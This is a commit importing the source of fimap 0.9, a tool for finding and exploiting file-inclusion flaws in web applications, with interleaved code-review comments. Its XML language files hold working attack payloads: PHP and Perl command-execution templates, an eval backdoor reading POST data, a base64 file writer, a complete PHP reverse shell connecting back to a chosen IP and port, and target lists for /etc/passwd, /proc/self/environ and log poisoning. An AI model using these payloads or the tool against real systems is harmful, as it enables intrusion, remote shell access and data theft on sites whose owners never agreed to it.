Commit 0fcebd15 authored by Devon Kearns's avatar Devon Kearns

Imported Upstream version 0.9

Project Homepage : http://fimap.googlecode.com
To run fimap type: python fimap.py
Needs: Python >= 2.4
This is fimap alpha .09 - For the Swarm.
New in this version:
* Cookie scanning and attacking.
* New 'AutoAwesome' operating mode.
* Dot-Truncation mode for breaking suffixes on windows servers.
* New --force-os switch which lets you define in advance which OS to assume.
* Better logfile kickstarter injection.
* Dynamic RFI encoder for webservers which interpret your (PHP) code (--rfi_encode=php_b64).
* Tons of bugfixes.
* Lots of stuff I forgot to mention.
Thanks for all guys who are reporting bugs. And sorry for the long delay of this version.
I am busy with a lot of other tools :O
And as zerg always make sure your queen spreads the creep!
If you want fresh infos about updates feel free to follow: http://twitter.com/fimap
Except no spam there. I only post fimap updates which I think are important.
Please report all bugs you find directly at the project homepage.
Just to be clear - This tool is designed to improve the quality and security of YOUR website!
DO NOT USE IT FOR ILLEGAL STUFF! BE A GOOD INTERNET CITIZEN LIKE YOU ARE IN REALLIFE!
#
# This file is part of fimap.
#
# Copyright(c) 2009-2010 Iman Karim(ikarim2s@smail.inf.fh-brs.de).
# http://fimap.googlecode.com
#
# This file may be licensed under the terms of of the
# GNU General Public License Version 2 (the ``GPL'').
#
# Software distributed under the License is distributed
# on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
# express or implied. See the GPL for the specific language
# governing rights and limitations.
#
# You should have received a copy of the GPL along with this
# program. If not, go to http://www.gnu.org/licenses/gpl.html
# or write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
from baseClass import baseClass
from targetScanner import targetScanner
from singleScan import singleScan
from xgoogle import BeautifulSoup
from copy import deepcopy
from crawler import crawler
import sys, time, Cookie
__author__="Iman Karim(ikarim2s@smail.inf.fh-brs.de)"
__date__ ="$09.11.2010 01:29:37$"
class autoawesome(baseClass):
def _load(self):
self.URL = None
def setURL(self, URL):
self.URL = URL
def scan(self):
print "Requesting '%s'..." %(self.URL)
extHeader = ""
code, headers = self.doRequest(self.URL, self.config["p_useragent"], self.config["p_post"], self.config["header"], self.config["p_ttl"])
if (headers != None):
for head in headers:
if head[0] in ("set-cookie", "set-cookie2"):
cookie = head[1]
c = Cookie.SimpleCookie()
c.load(cookie)
for k,v in c.items():
extHeader += "%s=%s; " %(k, c[k].value)
if (code == None):
print "Code == None!"
print "Does the target exist?!"
print "AutoAwesome mode failed. -> Aborting."
sys.exit(1)
if (extHeader != ""):
print "Cookies retrieved. Using them for further requests."
extHeader = extHeader.strip()[:-1]
if (self.config["header"].has_key("Cookie") and extHeader != ""):
print "WARNING: AutoAwesome mode got some cookies from the server."
print "Your defined cookies will be overwritten!"
if (extHeader != ""):
print "Testing file inclusion against given cookies..."
self.config["header"]["Cookie"] = extHeader
single = singleScan(self.config)
single.setURL(self.URL)
single.setQuite(True)
single.scan()
soup = BeautifulSoup.BeautifulSoup(''.join(code))
idx = 0
for form in soup.findAll("form"):
idx += 1
caption = None
desturl = None
method = None
if (soup.has_key("action")):
desturl = soup["action"]
else:
desturl = self.URL
if (form.has_key("name")):
caption = form["name"]
else:
caption = "Unnamed Form #%d" %(idx)
if (form.has_key("method")):
if (form["method"].lower() == "get"):
method = 0
else:
method = 1
else:
method = 1 # If no method is defined assume it's POST.
params = ""
for input in form.findAll("input"):
if (input.has_key("name")):
input_name = input["name"]
input_val = None
if (input.has_key("value")):
input_val = input["value"]
if (input_val == None):
params += "%s=&" %(input_name)
else:
params += "%s=%s&" %(input_name, input_val)
else:
print "An input field doesn't have an 'name' attribute! Skipping it."
if ("&" in params):
params = params[:-1]
print "Analyzing form '%s' for file inclusion bugs." %(caption)
modConfig = deepcopy(self.config)
if (method == 0):
# Append the current get params to the current URL.
if ("?" in desturl):
# There are already params in the URL.
desturl = "%s&%s" %(desturl, params)
else:
# There are no other params.
desturl = "%s&?%s" %(desturl, params)
else:
currentPost = modConfig["p_post"]
if (currentPost == None or currentPost == ""):
currentPost = params
else:
currentPost = currentPost + "&" + params
modConfig["p_post"] = currentPost
single = singleScan(modConfig)
single.setURL(desturl)
single.setQuite(True)
single.scan()
print "Starting harvester engine to get links (Depth: 0)..."
crawl = crawler(self.config)
crawl.crawl_url(self.URL, 0)
if (len(crawl.urlpool) == 0):
print "No links found."
else:
print "Harvesting done. %d links found. Analyzing links now..."%(len(crawl.urlpool))
for url in crawl.urlpool:
single = singleScan(self.config)
single.setURL(str(url[0]))
single.setQuite(True)
single.scan()
print "AutoAwesome is done."
\ No newline at end of file
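Review bot: `if (soup.has_key("action")):` inside the form loop of `scan()` tests the whole document rather than the form element, so `desturl` is always `self.URL` and a form's own `action` attribute is never read; the pair of lines should be `if (form.has_key("action")):` and `desturl = form["action"]`. A few lines further down the GET branch builds `"%s&?%s"` when `desturl` has no query string yet, which produces `...&?name=`; `"%s?%s"` is the intended separator. Separately, `c.load(cookie)` is fed a `Set-Cookie` value the remote server controls, and `Cookie.SimpleCookie` can raise `Cookie.CookieError` on an illegal cookie name, which is uncaught here and would abort the whole run over one odd header; wrapping the load in `try: ... except Cookie.CookieError:` and skipping that header keeps the scan going.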
import urllib, httplib, copy, urllib2
import string,random,os,socket, os.path
import xml.dom.minidom
import shutil
from time import gmtime, strftime
class baseTools(object):
LOG_ERROR = 99
LOG_WARN = 98
LOG_DEVEL = 1
LOG_DEBUG = 2
LOG_INFO = 3
LOG_ALWAYS= 4
config = None
log_lvl = None
boxsymbol = "#"
# Color hack
CONST_RST = "\033[0m"
CONST_COL = "\033[__BOLD__;3__COLOR__m"
BLACK = 0
RED = 1
GREEN = 2
YELLOW = 3
BLUE = 4
MAGENTA = 5
CYAN = 6
WHITE = 7
BOX_HEADER_STYLE = (1, 1)
BOX_SPLITTER_STYLE = (3, 0)
def getRandomStr(self):
chars = string.letters + string.digits
ret = ""
for i in range(8):
if (i==0):
ret = ret + random.choice(string.letters)
else:
ret = ret + random.choice(chars)
return ret
def initLog(self, config):
self.log_lvl = {}
self.log_lvl[baseTools.LOG_ERROR] = ("ERROR", (self.RED, 1))
self.log_lvl[baseTools.LOG_WARN] = ("WARN", (self.RED, 0))
self.log_lvl[baseTools.LOG_DEVEL] = ("DEVEL", (self.YELLOW, 0))
self.log_lvl[baseTools.LOG_DEBUG] = ("DEBUG", (self.CYAN, 0))
self.log_lvl[baseTools.LOG_INFO] = ("INFO", (self.BLUE, 0))
self.log_lvl[baseTools.LOG_ALWAYS] = ("OUT", (self.MAGENTA, 0))
self.LOG_LVL = config["p_verbose"]
self.use_color = config["p_color"]
self.config = config
if (self.use_color):
self.boxsymbol = self.CONST_COL + "#"
self.boxsymbol = self.boxsymbol.replace("__BOLD__", "1")
self.boxsymbol = self.boxsymbol.replace("__COLOR__", str(self.RED))
self.boxsymbol += self.CONST_RST
def _log(self, txt, LVL):
if (4-self.config["p_verbose"] < LVL):
logline = "[%s] %s" %(self.log_lvl[LVL][0], txt)
t = strftime("%H:%M:%S", gmtime())
if (self.use_color):
print "[%s] %s" %(t, self.__getColorLine(logline, self.log_lvl[LVL][1]))
else:
print "[%s] %s" %(t, logline)
def __setColor(self, txt, style):
ret = self.CONST_COL + txt
ret = ret.replace("__COLOR__", str(style[0]))
ret = ret.replace("__BOLD__", str(style[1]))
return(ret)
def __getColorLine(self, txt, style):
ret = self.__setColor(txt, style)
ret += self.CONST_RST
return(ret)
def drawBox(self, header, textarray, usecolor=None):
if (usecolor != None):
self.use_color = usecolor
maxLen = self.__getLongestLine(textarray, header) + 5
headspacelen = (maxLen/2 - len(header)/2)
print self.boxsymbol* (maxLen+1)
if (self.use_color):
cheader = self.__getColorLine(header, self.BOX_HEADER_STYLE)
self.__printBoxLine(cheader, maxLen, len(header))
else:
self.__printBoxLine(header, maxLen)
print self.boxsymbol* (maxLen+1)
for ln in textarray:
self.__printBoxLine(ln, maxLen)
print self.boxsymbol* (maxLen+1)
def __printBoxLine(self, txt, maxlen, realsize=-1):
size = len(txt)
if (realsize != -1): size = realsize
suffix = " " * (maxlen - size-1)
if (self.use_color):
coloredtxt = txt
if (txt.startswith("::")): # Informative Inline Message
coloredtxt = self.__getColorLine(txt, self.BOX_SPLITTER_STYLE)
print self.boxsymbol + coloredtxt + suffix + self.boxsymbol
else:
print self.boxsymbol + txt + suffix + self.boxsymbol
def __getLongestLine(self, textarray, header):
maxLen = len(header)
for ln in textarray:
if (len(ln) > maxLen):
maxLen = len(ln)
return(maxLen)
def getAttributeFromFirstNode(self, xmlfile, attrib):
if (os.path.exists(xmlfile)):
XML_plugin = xml.dom.minidom.parse(xmlfile)
XML_Rootitem = XML_plugin.firstChild
value = int(XML_Rootitem.getAttribute(attrib))
return(value)
else:
return False
def suggest_update(self, orginal_file, replacement_file):
#print orginal_file
#print replacement_file
inp = raw_input("Do you want to update? [y/N]")
if (inp == "Y" or inp == "y"):
print "Updating..."
os.unlink(orginal_file)
shutil.copy(replacement_file, orginal_file)
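Review bot: `suggest_update` calls `os.unlink(orginal_file)` before `shutil.copy` has succeeded, so a failed copy (missing replacement file, permission error) leaves the original deleted and nothing in its place. Copy beside the original first and then rename over it: `tmp = orginal_file + ".new"`, `shutil.copy(replacement_file, tmp)`, `os.rename(tmp, orginal_file)`. `getAttributeFromFirstNode` has a related asymmetry worth a docstring: it returns `False` when the file does not exist but raises `ValueError` from `int()` when the attribute is absent or non-numeric, because `getAttribute` yields `""` for a missing attribute, so callers see two different failure shapes. The class body appears to continue past the end of this section.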
#
# This file is part of fimap.
#
# Copyright(c) 2009-2010 Iman Karim(ikarim2s@smail.inf.fh-brs.de).
# http://fimap.googlecode.com
#
# This file may be licensed under the terms of of the
# GNU General Public License Version 2 (the ``GPL'').
#
# Software distributed under the License is distributed
# on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
# express or implied. See the GPL for the specific language
# governing rights and limitations.
#
# You should have received a copy of the GPL along with this
# program. If not, go to http://www.gnu.org/licenses/gpl.html
# or write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
__author__="Iman Karim(ikarim2s@smail.inf.fh-brs.de)"
__date__ ="$01.09.2009 13:56:47$"
settings = {}
settings["dynamic_rfi"] = {}
settings["dynamic_rfi"]["mode"] = "off" # Set to "ftp" or "local" to use Dynamic_RFI. Set it to "off" to disable it and rely on settings["filesrmt"] files.
###############
#!!!# WARNING #
###################################################################################################
# If you use dynamic_rfi make sure that NO file will be interpreted in the directory you define! #
# Else code (which should be interpreted on the victim server) will be executed on YOUR machine. #
# If you don't understand what I say then DON'T USE dynamic_rfi! #
###################################################################################################
# FTP Mode
settings["dynamic_rfi"]["ftp"] = {}
settings["dynamic_rfi"]["ftp"]["ftp_host"] = None
settings["dynamic_rfi"]["ftp"]["ftp_user"] = None
settings["dynamic_rfi"]["ftp"]["ftp_pass"] = None
settings["dynamic_rfi"]["ftp"]["ftp_path"] = None # A non existing file without suffix. Example: /home/imax/public_html/payload
settings["dynamic_rfi"]["ftp"]["http_map"] = None # The mapped HTTP path of the file. Example: http://localhost/~imax/payload
# Local Mode
settings["dynamic_rfi"]["local"] = {}
settings["dynamic_rfi"]["local"]["local_path"] = None # A non existing file on your filesystem without prefix which is reachable by http. Example: /var/www/payload
settings["dynamic_rfi"]["local"]["http_map"] = None # The http url of the file without prefix where the file is reachable from the web. Example: http://localhost/payload
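Review bot: `settings["dynamic_rfi"]["ftp"]["ftp_pass"] = None` invites the user to type an FTP password into a module that is tracked in version control, so a filled-in value is very likely to be committed in plaintext; the same applies to `ftp_user` and `ftp_host`. A comment on that line, `# Do not commit a real password here; keep credentials in an untracked local file or an environment variable and read them at startup`, would prevent the most common slip. The defaults of `None` are fine, but whatever consumes these settings should refuse to start `ftp` mode while any of the three is still `None` instead of handing `None` to the FTP client; that code is outside this file, so I cannot confirm it does.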
<?xml version="1.0" encoding="UTF-8"?>
<fimap language="generic" revision="0">
<relative_files>
<file path="/etc/passwd" find="root:" flags="r" unix="1" windows="0"/>
<file path="c:\boot.ini" find="[operating" flags="r" unix="0" windows="1"/>
<file path="/proc/self/environ" find="HTTP_USER_AGENT=" flags="rxA" unix="1" windows="0"/>
</relative_files>
<absolute_files>
</absolute_files>
<remote_files>
</remote_files>
<log_files>
<file path="/var/log/apache2/access.log" find='"GET /' flags="LHx" unix="1" windows="0" />
<file path="/var/log/apache/access.log" find='"GET /' flags="LHx" unix="1" windows="0" />
<file path="/var/log/httpd/access.log" find='"GET /' flags="LHx" unix="1" windows="0" />
<file path="/var/log/apache2/access_log" find='"GET /' flags="LHx" unix="1" windows="0" />
<file path="/var/log/apache/access_log" find='"GET /' flags="LHx" unix="1" windows="0" />
<file path="/var/log/httpd/access_log" find='"GET /' flags="LHx" unix="1" windows="0" />
</log_files>
<blind_files mindepth="0" maxdepth="15">
<file path="/etc/passwd" find="root:" flags="r" unix="1" windows="0"/>
<file path="c:\boot.ini" find="[operating" flags="r" unix="0" windows="1"/>
</blind_files>
<methods>
<unix concatcommand=";">
<shellquiz source="cm5kMSA9IHJhbmRvbS5yYW5kcmFuZ2UoMTAsIDk5KQpybmQyID0gcmFuZG9tLnJhbmRyYW5nZSgxMCwgOTkpCnJlc3VsdCA9IHN0cihybmQxICogcm5kMikKc2hlbGxjb2RlID0gImVjaG8gJCgoJWQqJWQpKSIlKHJuZDEsIHJuZDIpCnJldCA9IChzaGVsbGNvZGUsIHJlc3VsdCk=" />
<kernelversion source="uname -r -s" />
<currentdir source="pwd" />
<currentuser source="whoami" />
<cd source="cd '__DIR__'" />
</unix>
<windows concatcommand="&amp;">
<shellquiz source="cm5kMSA9IHJhbmRvbS5yYW5kcmFuZ2UoMTAsIDk5KQpybmQyID0gcmFuZG9tLnJhbmRyYW5nZSgxMCwgOTkpCnJlc3VsdCA9IHN0cihybmQxICogcm5kMikKc2hlbGxjb2RlID0gInNldCAvYSAlZColZCIlKHJuZDEsIHJuZDIpCnJldCA9IChzaGVsbGNvZGUsIHJlc3VsdCkK" />
<kernelversion source="ver" />
<currentdir source="chdir" />
<currentuser source="echo %USERNAME%" />
<cd source='cd "__DIR__"' />
</windows>
</methods>
<languagesets>
<language name="PHP" langfile="php.xml" />
<language name="Perl" langfile="perl.xml" />
</languagesets>
</fimap>
<?xml version="1.0" encoding="UTF-8"?>
<fimap language="perl" revision="0" force_inclusion_test="1" autor="Iman Karim (ikarim2s@smail.inf.fh-brs.de)" >
<snipe regex="Can't locate (?P&lt;script&gt;[\d\w/\.\-]*?%s[\d\w/\.\-]*?) in .*? at.*?line \d+?\." />
<relative_files>
</relative_files>
<absolute_files>
</absolute_files>
<remote_files>
<file path="http://www.apache.org/dyn/closer.cgi" find="We suggest the following mirror site for your download" flags="rR" unix="1" windows="1"/>
</remote_files>
<log_files>
</log_files>
<exec_methods>
<exec unix="1" win="0" dobase64="1" name="system[b64]" source='use MIME::Base64; system(base64_decode("__PAYLOAD__")) . " 2&gt;&amp;1";' />
<exec unix="1" win="0" dobase64="0" name="system" source='system("__PAYLOAD__" . " 2&gt;&amp;1";' />
<exec unix="0" win="1" dobase64="1" name="system[b64][win]" source='use MIME::Base64; system(base64_decode("__PAYLOAD__"));' />
<exec unix="0" win="1" dobase64="0" name="system[win]" source='system("__PAYLOAD__");' />
</exec_methods>
<payloads>
</payloads>
<methods>
<quiz isbase64="1" source="cm5kID0gc2VsZi5nZXRSYW5kb21TdHIoKQpwaHBjb2RlID0gImVjaG8gIgpmb3IgYyBpbiBybmQ6CiAgICBwaHBjb2RlICs9ICJjaHIoJWQpLiIlKG9yZChjKSkKcGhwY29kZSA9ICI8P3BocCAlczsgPz4iICUocGhwY29kZVs6LTFdKQpyZXQgPSAocGhwY29kZSwgcm5kKQo=" />
<print isbase64="0" source="print '__PLACEHOLDER__';" />
</methods>
<detectors>
<include_patterns>
<pattern regex="in .*? at (.*?) line \d+?\." />
</include_patterns>
<readfile_patterns>
</readfile_patterns>
<extentions>
<extention ext=".cgi"/>
<extention ext=".pl"/>
</extentions>
</detectors>
</fimap>
<?xml version="1.0" encoding="UTF-8"?>
<fimap language="php" revision="3" force_inclusion_test="0" autor="Iman Karim (ikarim2s@smail.inf.fh-brs.de)" >
<snipe regex="Failed opening( required)* '(?P&lt;incname&gt;[\d\w/\.\-:\\]*?%s[\d\w/\.\-\\]*?)' (for inclusion)*" />
<relative_files>
</relative_files>
<absolute_files>
<file path="php://input" post="__QUIZ__" find="__ANSWER__" flags="rxP" unix="1" windows="1"/>
</absolute_files>
<remote_files>
<file path="http://www.phpbb.de/index.php" find="Willkommen auf phpBB.de" flags="rR" unix="1" windows="1"/>
</remote_files>
<log_files>
</log_files>
<exec_methods>
<exec unix="1" win="0" dobase64="1" name="popen[b64]" source='&lt;?php $h=popen(base64_decode("__PAYLOAD__") . " 2&gt;&amp;1", "r");while(!feof($h)){$l=fread($h, 2024);echo $l;}?&gt;' />
<exec unix="1" win="0" dobase64="1" name="passthru[b64]" source='&lt;?php passthru (base64_decode("__PAYLOAD__"). " 2&gt;&amp;1"); ?&gt;' />
<exec unix="1" win="0" dobase64="1" name="exec[b64]" source='&lt;?php exec(base64_decode("__PAYLOAD__"). " 2&gt;&amp;1", $arr); $data = join("\n",$arr); echo $data; ?&gt;' />
<exec unix="1" win="0" dobase64="1" name="popen[b64]" source='&lt;?php system (base64_decode("__PAYLOAD__"). " 2&gt;&amp;1"); ?&gt;' />
<exec unix="1" win="0" dobase64="0" name="popen" source='&lt;?php $h=popen("__PAYLOAD__" . " 2&gt;&amp;1", "r");while(!feof($h)){$l=fread($h, 2024);echo $l;}?&gt;' />
<exec unix="1" win="0" dobase64="0" name="passthru" source='&lt;?php passthru ("__PAYLOAD__". " 2&gt;&amp;1"); ?&gt;' />
<exec unix="1" win="0" dobase64="0" name="exec" source='&lt;?php exec("__PAYLOAD__". " 2&gt;&amp;1", $arr); $data = join("\n", $arr); echo $data; ?&gt;' />
<exec unix="1" win="0" dobase64="0" name="system" source='&lt;?php system ("__PAYLOAD__". " 2&gt;&amp;1"); ?&gt;' />
<exec unix="0" win="1" dobase64="1" name="popen[b64][win]" source='&lt;?php $h=popen(base64_decode("__PAYLOAD__") , "r");while(!feof($h)){$l=fread($h, 2024);echo $l;}?&gt;' />
<exec unix="0" win="1" dobase64="1" name="passthru[b64][win]" source='&lt;?php passthru (base64_decode("__PAYLOAD__")); ?&gt;' />
<exec unix="0" win="1" dobase64="1" name="exec[b64][win]" source='&lt;?php exec(base64_decode("__PAYLOAD__"), $arr); $data = join("\n",$arr); echo $data; ?&gt;' />
<exec unix="0" win="1" dobase64="1" name="popen[b64][win]" source='&lt;?php system (base64_decode("__PAYLOAD__")); ?&gt;' />
<exec unix="0" win="1" dobase64="0" name="popen[win]" source='&lt;?php $h=popen("__PAYLOAD__" , "r");while(!feof($h)){$l=fread($h, 2024);echo $l;}?&gt;' />
<exec unix="0" win="1" dobase64="0" name="passthru[win]" source='&lt;?php passthru ("__PAYLOAD__"); ?&gt;' />
<exec unix="0" win="1" dobase64="0" name="exec[win]" source='&lt;?php exec ("__PAYLOAD__", $arr); $data = join("\n",$arr); echo $data; ?&gt;' />
<exec unix="0" win="1" dobase64="0" name="system[win]" source='&lt;?php system ("__PAYLOAD__"); ?&gt;' />
</exec_methods>
<payloads>
<payload name="Spawn pentestmonkey's reverse shell" dobase64="0" inshell="0" unix="1" win="0">
<input type="question" text="IP Address to connect back to: " placeholder="__IP__" />
<input type="question" text="The Port it should connect back: " placeholder="__PORT__" />
<input type="wait" text="Make your netcat server ready and hit enter..." />
<code source='&lt;?php set_time_limit (0);$VERSION = "1.0";$ip = "__IP__";$port = __PORT__;$chunk_size = 1400;$write_a = null;$error_a = null;$shell = "uname -a; w; id; /bin/sh -i";$daemon = 0;$debug = 0;if (function_exists("pcntl_fork")) { $pid = pcntl_fork();if ($pid == -1) { printit("ERROR: Cant fork");exit(1);} if ($pid) { exit(0);} if (posix_setsid() == -1) { printit("Error: Cant setsid()");exit(1);} $daemon = 1;} else {printit("WARNING: Failed to daemonise.This is quite common and not fatal.");}chdir("/");umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) { printit("$errstr ($errno)");exit(1);}$descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Cant spawn shell"); exit(1);}stream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {if (feof($sock)) {printit("ERROR: Shell connection terminated");break;} if (feof($pipes[1])) {printit("ERROR: Shell process terminated"); break;} $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);} if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input");fwrite($sock, $input);} if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input");fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);function printit ($string) { if (!$daemon) { print "$string\n";}}?&gt;' />
</payload>
</payloads>
<methods>
<quiz isbase64="1" source="cm5kID0gc2VsZi5nZXRSYW5kb21TdHIoKQpwaHBjb2RlID0gImVjaG8gIgpmb3IgYyBpbiBybmQ6CiAgICBwaHBjb2RlICs9ICJjaHIoJWQpLiIlKG9yZChjKSkKcGhwY29kZSA9ICI8P3BocCAlczsgPz4iICUocGhwY29kZVs6LTFdKQpyZXQgPSAocGhwY29kZSwgcm5kKQo=" />
<print isbase64="0" source="&lt;?php echo '__PLACEHOLDER__'; ?&gt;" />
<eval_kickstarter isbase64="0" source="&lt;?php eval(base64_decode($_POST['data'])); ?&gt;" />
<write_file isbase64="1" source="PD9waHAgJG15RmlsZSA9ICJfX0ZJTEVfXyI7CiRmaCA9IGZvcGVuKCRteUZpbGUsICdfX01PREVfXycpIG9yIGRpZSgiRkFJTEVEIik7CiRkID0gYmFzZTY0X2RlY29kZSgiX19CNjRfREFUQV9fIik7CmZ3cml0ZSgkZmgsICRkKTsKZmNsb3NlKCRmaCk7ID8+" />
</methods>
<detectors>
<include_patterns>
<pattern regex="\(include_path='.*?'\) in &lt;b&gt;(?P&lt;script&gt;.*?)&lt;/b&gt;* on line" />
<pattern regex="failed to open stream: No such file or directory \((?P&lt;script&gt;.*?)- Line" />
<pattern regex="An error occurred in script '(?P&lt;script&gt;.*?)' on line \d?." />
<pattern regex="Failed opening '.*?' for inclusion in &lt;b&gt; (?P&lt;script&gt;.*?)&lt;/b&gt; on line" />
<pattern regex="Failed opening '.*?' for inclusion .*? in (&lt;b&gt; )?(?P&lt;script&gt;.*?) (&lt;b&gt; )?on line" />
<pattern regex="Failed opening required '.*?' .*? in (?P&lt;script&gt;.*?) on" />
<pattern regex="failed to open stream:.*?@(?P&lt;script&gt;.*?):" />
<pattern regex="in file &lt;b&gt;(?P&lt;script&gt;.*?)&lt;/b&gt;" />
<pattern regex="failed to open stream: No such file or directory in (?P&lt;script&gt;.*?) on line" />
<pattern regex="failed to open stream: No such file or directory in &lt;b&gt;(?P&lt;script&gt;.*?)&lt;/b&gt; on line" />
<pattern regex="Failed opening .*? for inclusion .*?on (?P&lt;script&gt;.*?) " />
</include_patterns>
<readfile_patterns>
<pattern regex="&lt;b&gt;Warning&lt;/b&gt;: file(.*?%s.*?)*" />
<pattern regex="&lt;b&gt;Warning&lt;/b&gt;: read_file(.*?%s.*?)*" />
<pattern regex="&lt;b&gt;Warning&lt;/b&gt;: highlight_file(.*?%s.*?)*" />
<pattern regex="&lt;b&gt;Warning&lt;/b&gt;: show_source(.*?%s.*?)*" />
</readfile_patterns>
<extentions>
<extention ext=".php" />
<extention ext=".php3" />
<extention ext=".php4" />
<extention ext=".php5" />
<extention ext=".phtml" />
</extentions>
</detectors>
</fimap>
#
# This file is part of fimap.
#
# Copyright(c) 2009-2010 Iman Karim(ikarim2s@smail.inf.fh-brs.de).
# http://fimap.googlecode.com
#
# This file may be licensed under the terms of of the
# GNU General Public License Version 2 (the ``GPL'').
#
# Software distributed under the License is distributed
# on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
# express or implied. See the GPL for the specific language
# governing rights and limitations.
#
# You should have received a copy of the GPL along with this
# program. If not, go to http://www.gnu.org/licenses/gpl.html
# or write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
import os.path
from xgoogle.BeautifulSoup import BeautifulSoup
import os, urllib2, urllib, socket
__author__="Iman Karim(ikarim2s@smail.inf.fh-brs.de)"
__date__ ="$09.09.2009 21:52:30$"
class crawler:
def __init__(self, config):
self.goodTypes = ("html", "php", "php4", "php5", "jsp", "htm", "py", "pl", "asp", "cgi", "/")
self.config = config
self.urlpool = []
def crawl(self):
root_url = self.config["p_url"]
outfile = open(self.config["p_write"], "a")
idx = 0
print "[%d] Going to root URL: '%s'..." %(idx, root_url)
if (self.countChar(root_url, "/") == 2):
root_url = root_url + "/"
self.crawl_url(root_url)
while(len(self.urlpool)-idx > 0):
url , level = self.urlpool[idx]
url = self.__encodeURL(url)
print "[Done: %d | Todo: %d | Depth: %d] Going for next URL: '%s'..." %(idx, len(self.urlpool) - idx, level, url)
outfile.write(url + "\n")
self.crawl_url(url, level)
idx = idx +1
print "Harvesting done."
outfile.close()
def countChar(self, word, c):
cnt = 0
for w in word:
if w == c:
cnt += 1
return(cnt)
def crawl_url(self, url, level=0):
if (url.count("/") == 2): # If the user provides 'http://www.google.com' append an / to it.
url += "/"
code = self.__simpleGetRequest(url)
domain = self.getDomain(url, True)
if (code != None):
soup = None
try:
soup = BeautifulSoup(code)
except:
pass
if soup != None:
for tag in soup.findAll('a'):
isCool = False
new_url = None
try:
new_url = tag['href']
except KeyError, err:
pass
if new_url != None and not new_url.startswith("#") and not new_url.startswith("javascript:"):
if(new_url.startswith("http://") or new_url.startswith("https://")):
if (new_url.lower().startswith(domain.lower())):
isCool = True
else:
if (new_url.startswith("/")):
new_url = os.path.join(domain, new_url[1:])
else:
new_url = os.path.join(os.path.dirname(url), new_url)
isCool = True
if (isCool and self.isURLinPool(new_url)):
isCool = False
if (isCool):
tmpUrl = new_url
if (tmpUrl.find("?") != -1):
tmpUrl = tmpUrl[:tmpUrl.find("?")]
for suffix in self.goodTypes:
if (tmpUrl.endswith(suffix)):
if (level+1 <= self.config["p_depth"]):
self.urlpool.append((new_url, level+1))
break
def isURLinPool(self, url):
for u, l in self.urlpool:
if u.lower() == url.lower():
return True
return False
def __simpleGetRequest(self, URL, TimeOut=10):
try:
try:
opener = urllib2.build_opener()
opener.addheaders = [('User-agent', self.config["p_useragent"])]
f = opener.open(URL, timeout=TimeOut) # TIMEOUT
ret = f.read()
f.close()
return(ret)
except TypeError, err:
try:
# Python 2.5 compatiblity
socket.setdefaulttimeout(TimeOut)
f = opener.open(URL)
ret = f.read()
f.close()
return(ret)
except Exception, err:
raise
except:
raise